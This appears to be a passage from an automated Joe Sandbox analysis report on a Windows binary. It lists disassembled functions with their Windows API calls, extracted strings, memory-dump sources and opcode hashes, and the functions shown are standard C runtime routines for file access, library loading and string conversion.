                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: aa779bde36d9e061813558042c8556282970ac181f840f9594f4ad85a9a1b274
                                                                                                                                                                                                                                                                  • Instruction ID: 086724d0c78a6036feea91a634f70465ec0724e28c240b76aa7ea1aaa16315db
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa779bde36d9e061813558042c8556282970ac181f840f9594f4ad85a9a1b274
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39E08232900248EFCB40DBA8C049F4AB3F9EB08348F1048A8E804C3200C234EE80CA00
                                                                                                                                                                                                                                                                  Function 006BED17 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fb8588dfe5004e7bd77bbba25fc7cbf581f86a86f676ca6ce434718d11d9ad95
                                                                                                                                                                                                                                                                  • Instruction ID: 97f575ef58cfbe95cb8f9320c599046d0709180d930c81f17680c93a20dcab05
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb8588dfe5004e7bd77bbba25fc7cbf581f86a86f676ca6ce434718d11d9ad95
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35C08C7400090047CE39D910C3713E43366AB92B82FC0088CC4120BB42D55F9CC3DB20
                                                                                                                                                                                                                                                                  Function 006D96DC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 273COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 006D90CB: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 006D90E8
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006D97F0
                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 006D9803
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006D980D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 006D9836
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 006D9983
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006D99B5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                                  • API String ID: 3086256261-2852464175
                                                                                                                                                                                                                                                                  • Opcode ID: ffa18d318651510c61b0d175406ee2ed1c2d3e2dddb30ab266b284106581b1ed
                                                                                                                                                                                                                                                                  • Instruction ID: f2acee0fcfa0d3471c4c71a9f33e1cf1c2a607d51a14d9b59c20097a378d54b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffa18d318651510c61b0d175406ee2ed1c2d3e2dddb30ab266b284106581b1ed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EA12632E141549FCF19DF68DC91BAD7BA2AB07320F18415EF802AF391DB358912CBA5
                                                                                                                                                                                                                                                                  Function 006BD220 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 166COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00745E52,00000104), ref: 006BD27D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                                                  • String ID: ^t$...$<program name unknown>$Microsoft Visual C++ Runtime Library$R^t$Runtime Error!Program:
                                                                                                                                                                                                                                                                  • API String ID: 514040917-4157939772
                                                                                                                                                                                                                                                                  • Opcode ID: 05c382c35a255fd08436617686aedee327ac4c73f6d722affbf04008c4b85502
                                                                                                                                                                                                                                                                  • Instruction ID: 0a5950e9f4970acf69da86dc9d05d709d2eff906dda607d5dacdb46371ace9c2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05c382c35a255fd08436617686aedee327ac4c73f6d722affbf04008c4b85502
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A2149B2E4061537D63162219C0AEEB369F9F92708F400439FD089A347F765CB41C3D9
                                                                                                                                                                                                                                                                  Function 006C3CAB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 006C3D6C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                  • Opcode ID: 2cb4912e5a6336a28fa97d4cc8eeb89f15c1c3e654dc72afe908ce39648b3195
                                                                                                                                                                                                                                                                  • Instruction ID: 33462ae304ac4b14fa91cbebcf0b737e443ecb5aebb43a1daaf3146ef6f559d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb4912e5a6336a28fa97d4cc8eeb89f15c1c3e654dc72afe908ce39648b3195
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2721F335A01221ABCB219B25DC40FBA376ADF43760F158119F953A7390E770FE00C6D1
                                                                                                                                                                                                                                                                  Function 00676D2A Relevance: 9.2, APIs: 6, Instructions: 225COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 00676DB5
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00676E41
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00676EAC
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00676EC8
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00676F2B
                                                                                                                                                                                                                                                                  • CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00676F48
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2984826149-0
                                                                                                                                                                                                                                                                  • Opcode ID: 088af79065226a94862348b33447982bcfdf61864175bd613b4288e3d1bffd20
                                                                                                                                                                                                                                                                  • Instruction ID: 4c469a5daaacbeacd613c5b889e881008db50b7475fce6fcda8d3c5e7ea71493
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088af79065226a94862348b33447982bcfdf61864175bd613b4288e3d1bffd20
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC71E272E14A15ABDF309FA4DC41BEEBBB7AF05314F158069F818A7290D7389C04CBA0
                                                                                                                                                                                                                                                                  Function 006543EA Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00654433
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 0065449E
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006544BB
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006544FA
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00654559
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0065457C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2829165498-0
                                                                                                                                                                                                                                                                  • Opcode ID: c71de3ae87eecb367abf4aa57e83f839d3698c50c72966ec013c75d439a66e94
                                                                                                                                                                                                                                                                  • Instruction ID: 8ba3b2b37ccbc12017169bdb0f9ddd865c0bb04e5c81db8b0d4bbaa631f3a7b2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c71de3ae87eecb367abf4aa57e83f839d3698c50c72966ec013c75d439a66e94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD51E272900216ABDB208F60CC41FEF7BAAEF4574AF114169FD04E6250EB35CD99CBA0
                                                                                                                                                                                                                                                                  Function 006BED41 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,763EDE73,?,?,00000000,006EAF32,000000FF,?,006BECA4,?,?,006BEC53,?), ref: 006BED76
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006BED88
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,006EAF32,000000FF,?,006BECA4,?,?,006BEC53,?), ref: 006BEDAA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                  • Opcode ID: 5fd335bd897b35549b78ef74fd599e828d64d3e5dfb529cf7799eca4c012dcb7
                                                                                                                                                                                                                                                                  • Instruction ID: eb32f535509d900754bdcbb3aa9aeba7da669c73e298c9ad01217bf1fa6a4f6a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fd335bd897b35549b78ef74fd599e828d64d3e5dfb529cf7799eca4c012dcb7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B01DB75954619EFCB118F94DC05BFEBBB9FF05714F004526F811A22E0DBB99900CB54
                                                                                                                                                                                                                                                                  Function 006C3EDE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,006C3E7A), ref: 006C3EED
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,006C3E7A), ref: 006C3EF7
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 006C3F35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
